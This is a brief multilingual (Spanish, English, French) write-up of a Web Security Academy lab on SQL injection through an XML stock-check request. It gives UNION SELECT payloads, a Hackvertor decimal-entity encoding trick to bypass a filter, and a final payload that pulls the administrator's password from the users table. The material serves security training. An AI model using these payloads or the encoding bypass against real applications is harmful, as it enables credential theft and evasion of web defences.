Bypass de filtros con codificación XML en Inyección SQL

SQL injection with filter bypass via XML encoding

Lab: SQL injection with filter bypass via XML encoding | Web Security AcademyWebSecAcademy

Ce laboratoire contient une vulnérabilité d’injection SQL dans la fonctionnalité de vérification de stock. Les résultats de la requête sont renvoyés dans la réponse de l’application ; on peut donc utiliser une attaque UNION pour récupérer des données depuis d’autres tables. La base de données contient une table users qui contient les noms d’utilisateur et les mots de passe des utilisateurs enregistrés. Pour résoudre le laboratoire, effectuez une attaque d’injection SQL pour récupérer les identifiants de l’utilisateur admin, puis connectez-vous à son compte.

Exemples fournis :

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>2</productId>
  <storeId>2 union select 1</storeId>
</stockCheck>

Extension Hackvertor — entités décimales

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
  <productId>2</productId>
  <storeId><@dec_entities>2 union select 1</@dec_entities></storeId>
</stockCheck>

<@dec_entities>
2 union select password from users where username='administrator'
</@dec_entities>

Mis à jour il y a 5 mois

hashtagSQL injection with filter bypass via XML encoding

SQL injection with filter bypass via XML encoding